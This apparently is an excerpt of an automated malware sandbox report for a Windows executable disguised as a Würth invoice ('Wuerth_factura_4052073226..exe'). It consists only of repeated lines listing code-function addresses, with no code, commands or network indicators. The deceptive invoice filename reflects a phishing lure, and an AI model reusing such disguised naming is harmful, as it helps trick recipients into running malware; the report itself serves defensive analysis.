Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB0B30	4_2_39DB0B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB0B20	4_2_39DB0B20
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBEAF8	4_2_39DBEAF8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE6B0	4_2_39DBE6B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE6AF	4_2_39DBE6AF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE6A0	4_2_39DBE6A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE258	4_2_39DBE258
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE257	4_2_39DBE257
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE24D	4_2_39DBE24D
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB1E70	4_2_39DB1E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBDE00	4_2_39DBDE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4ED0	4_2_3A5F4ED0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F7B78	4_2_3A5F7B78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F8FB0	4_2_3A5F8FB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F81D0	4_2_3A5F81D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FEE57	4_2_3A5FEE57
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1A50	4_2_3A5F1A50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1A4F	4_2_3A5F1A4F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1A41	4_2_3A5F1A41
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FCE78	4_2_3A5FCE78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4A78	4_2_3A5F4A78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6E72	4_2_3A5F6E72
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6E70	4_2_3A5F6E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FEE68	4_2_3A5FEE68
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FCE67	4_2_3A5FCE67
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6A18	4_2_3A5F6A18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6A07	4_2_3A5F6A07
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4622	4_2_3A5F4622
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4620	4_2_3A5F4620
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F72CA	4_2_3A5F72CA
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F72C8	4_2_3A5F72C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4EC0	4_2_3A5F4EC0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FF2F8	4_2_3A5FF2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FD2F7	4_2_3A5FD2F7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F22F0	4_2_3A5F22F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FF2E7	4_2_3A5FF2E7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1E98	4_2_3A5F1E98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1EA8	4_2_3A5F1EA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2758	4_2_3A5F2758
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2749	4_2_3A5F2749
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FF778	4_2_3A5FF778
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F5770	4_2_3A5F5770
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F7B69	4_2_3A5F7B69
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FB318	4_2_3A5FB318
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FD308	4_2_3A5FD308
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FB307	4_2_3A5FB307
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2300	4_2_3A5F2300
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F5328	4_2_3A5F5328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F7722	4_2_3A5F7722
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F7720	4_2_3A5F7720
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F5BD8	4_2_3A5F5BD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2FF9	4_2_3A5F2FF9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FD798	4_2_3A5FD798
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FB798	4_2_3A5FB798
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FF788	4_2_3A5FF788
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FD787	4_2_3A5FD787
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F5780	4_2_3A5F5780
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2BB0	4_2_3A5F2BB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FB7A8	4_2_3A5FB7A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2BA0	4_2_3A5F2BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F8FA0	4_2_3A5F8FA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F3450	4_2_3A5F3450
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F0040	4_2_3A5F0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6478	4_2_3A5F6478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F3460	4_2_3A5F3460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FDC19	4_2_3A5FDC19
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FFC18	4_2_3A5FFC18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F3008	4_2_3A5F3008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FBC38	4_2_3A5FBC38
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6030	4_2_3A5F6030
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FBC29	4_2_3A5FBC29
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FDC28	4_2_3A5FDC28
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6026	4_2_3A5F6026
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC0C8	4_2_3A5FC0C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F08F0	4_2_3A5F08F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F0498	4_2_3A5F0498
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6488	4_2_3A5F6488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE0B8	4_2_3A5FE0B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F38B8	4_2_3A5F38B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC0B7	4_2_3A5FC0B7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE0A7	4_2_3A5FE0A7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC558	4_2_3A5FC558
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE548	4_2_3A5FE548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F0D48	4_2_3A5F0D48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC548	4_2_3A5FC548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FA938	4_2_3A5FA938
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE538	4_2_3A5FE538
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FA928	4_2_3A5FA928
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE9D8	4_2_3A5FE9D8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC9D8	4_2_3A5FC9D8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE9C8	4_2_3A5FE9C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F15F8	4_2_3A5F15F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F15E8	4_2_3A5F15E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC9E8	4_2_3A5FC9E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F119F	4_2_3A5F119F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F11A0	4_2_3A5F11A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A666678	4_2_3A666678
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665FD8	4_2_3A665FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669FD8	4_2_3A669FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660960	4_2_3A660960
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667E60	4_2_3A667E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66D460	4_2_3A66D460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66A968	4_2_3A66A968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664468	4_2_3A664468
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66D470	4_2_3A66D470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661270	4_2_3A661270
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669171	4_2_3A669171
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66E77F	4_2_3A66E77F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664478	4_2_3A664478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662478	4_2_3A662478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66BC78	4_2_3A66BC78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66C144	4_2_3A66C144
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660040	4_2_3A660040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A666B40	4_2_3A666B40
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665B48	4_2_3A665B48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669648	4_2_3A669648
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663B49	4_2_3A663B49
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66EC49	4_2_3A66EC49
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66C150	4_2_3A66C150
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660950	4_2_3A660950
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667E50	4_2_3A667E50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663B58	4_2_3A663B58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66EC58	4_2_3A66EC58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66A958	4_2_3A66A958
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66D927	4_2_3A66D927
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66F120	4_2_3A66F120
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665228	4_2_3A665228
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A668328	4_2_3A668328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669637	4_2_3A669637
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66AE30	4_2_3A66AE30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A666B30	4_2_3A666B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66663E	4_2_3A66663E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663238	4_2_3A663238
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66D938	4_2_3A66D938
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665B39	4_2_3A665B39
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660006	4_2_3A660006
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66DE00	4_2_3A66DE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664908	4_2_3A664908
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667008	4_2_3A667008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66C608	4_2_3A66C608
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661710	4_2_3A661710
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669B10	4_2_3A669B10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66F111	4_2_3A66F111
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66AE1F	4_2_3A66AE1F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662918	4_2_3A662918
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66C618	4_2_3A66C618
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A668318	4_2_3A668318
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665219	4_2_3A665219
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66CAE0	4_2_3A66CAE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660DE0	4_2_3A660DE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6687E0	4_2_3A6687E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663FE8	4_2_3A663FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66F5E8	4_2_3A66F5E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661FE8	4_2_3A661FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66B2E8	4_2_3A66B2E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6648F7	4_2_3A6648F7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660DF0	4_2_3A660DF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6687F0	4_2_3A6687F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66DDF0	4_2_3A66DDF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6616FF	4_2_3A6616FF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669AFF	4_2_3A669AFF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A666FFB	4_2_3A666FFB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661FF8	4_2_3A661FF8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66B2F8	4_2_3A66B2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665FC7	4_2_3A665FC7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66B7C0	4_2_3A66B7C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6604C0	4_2_3A6604C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6636C8	4_2_3A6636C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66E2C8	4_2_3A66E2C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669FC8	4_2_3A669FC8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66F5D7	4_2_3A66F5D7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6604D0	4_2_3A6604D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6674D0	4_2_3A6674D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66CAD1	4_2_3A66CAD1
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663FD8	4_2_3A663FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66CFA7	4_2_3A66CFA7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661BA0	4_2_3A661BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66A4A0	4_2_3A66A4A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66FAA0	4_2_3A66FAA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66B7AF	4_2_3A66B7AF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662DA8	4_2_3A662DA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66CFA8	4_2_3A66CFA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6656A8	4_2_3A6656A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A668CA9	4_2_3A668CA9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66FAB0	4_2_3A66FAB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6674BF	4_2_3A6674BF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6656B8	4_2_3A6656B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A668CB8	4_2_3A668CB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66E2B8	4_2_3A66E2B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661280	4_2_3A661280
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669180	4_2_3A669180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66A48F	4_2_3A66A48F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662488	4_2_3A662488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66BC88	4_2_3A66BC88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667988	4_2_3A667988
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664D89	4_2_3A664D89
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66E790	4_2_3A66E790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661B91	4_2_3A661B91
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662D9C	4_2_3A662D9C
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664D98	4_2_3A664D98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667998	4_2_3A667998
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6870C0	4_2_3A6870C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A68D710	4_2_3A68D710
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A684E60	4_2_3A684E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681C60	4_2_3A681C60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686A70	4_2_3A686A70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A68EE48	4_2_3A68EE48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686440	4_2_3A686440
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683240	4_2_3A683240
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680040	4_2_3A680040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A684820	4_2_3A684820
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681620	4_2_3A681620
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A685E00	4_2_3A685E00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A682C00	4_2_3A682C00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A685AE0	4_2_3A685AE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6828E0	4_2_3A6828E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683EC0	4_2_3A683EC0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680CC0	4_2_3A680CC0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6854A0	4_2_3A6854A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6822A0	4_2_3A6822A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683880	4_2_3A683880
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680680	4_2_3A680680
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686A80	4_2_3A686A80
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686760	4_2_3A686760
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683560	4_2_3A683560
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680360	4_2_3A680360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A684B40	4_2_3A684B40
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681940	4_2_3A681940
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686750	4_2_3A686750
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686120	4_2_3A686120
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A682F20	4_2_3A682F20
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A684500	4_2_3A684500
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681300	4_2_3A681300
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6841E0	4_2_3A6841E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680FE0	4_2_3A680FE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6857C0	4_2_3A6857C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6825C0	4_2_3A6825C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680FD0	4_2_3A680FD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686DA0	4_2_3A686DA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683BA0	4_2_3A683BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6809A0	4_2_3A6809A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A685180	4_2_3A685180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681F80	4_2_3A681F80
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A698470	4_2_3A698470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691CF0	4_2_3A691CF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69FB30	4_2_3A69FB30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69E870	4_2_3A69E870
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69B670	4_2_3A69B670
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690040	4_2_3A690040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A699A50	4_2_3A699A50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69CC50	4_2_3A69CC50
